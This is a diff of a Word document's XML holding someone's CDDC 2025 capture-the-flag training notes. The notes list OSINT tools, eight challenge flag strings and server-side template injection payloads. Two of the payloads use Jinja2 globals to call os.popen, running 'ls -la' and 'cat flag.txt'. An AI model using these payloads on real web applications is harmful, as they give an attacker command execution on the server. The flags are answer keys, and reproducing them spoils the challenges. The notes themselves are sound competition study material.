--- a/DSTA CDDC/Training/CDDC2025.docx
+++ b/DSTA CDDC/Training/CDDC2025.docx
@@ -132,6 +132,355 @@
       <w:r>
         <w:t xml:space="preserve"> - Introduction to Hardware CWE</w:t>
       </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>osint</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">- </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>shodan</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>censys</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> ,</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>torsocks</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>, ,</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>maltego</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>wayback machine to look for website changes</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>picarta</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> for location using image AI searching</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>CDDC2025{collect_validate_analyze_document_secure_share_standby_repeat}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>CDDC2025{p4ck3t_1nspect10n_f1rew4ll_1ntrus10n_d3t3ct10n}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>CDDC2025{s1mpl3_3xpl0it4tion_g4me}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>CDDC2025{th0rou9h_pr0cedur3_inv0lv1ng_3vid3nce_c0llect1on_plu5_pr0p3r_4nalys1s}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>CDDC2025{und3rst4ndin9_4pplic4t1on_s0urc3_c0de_l0gic_us1ng_*********_re4son1ng}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>CDDC2025{m4gic_happ3n1ng_in51de_c0mputer5}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>CDDC2025{wh3re_th3_w0rld_wond3rs}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>CDDC2025{v4luabl3_h1dden_****_********_****_*****_*******_******}</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">SSTI = </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>{{ 2</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>+2}}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>{{ request</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>application._</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>_globals_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>_._</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>_builtins__.__import__('os').popen('ls -la</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>).read() }}</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>{{ request</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>application._</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>_globals_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>_._</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>_builtins_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>_._</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>_import__('os'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>).popen</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">('cat </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>flag.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>).read</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>) }</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
@@ -746,7 +1095,6 @@
   <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:semiHidden/>
     <w:unhideWhenUsed/>
   </w:style>
   <w:style w:type="table" w:default="1" w:styleId="TableNormal">
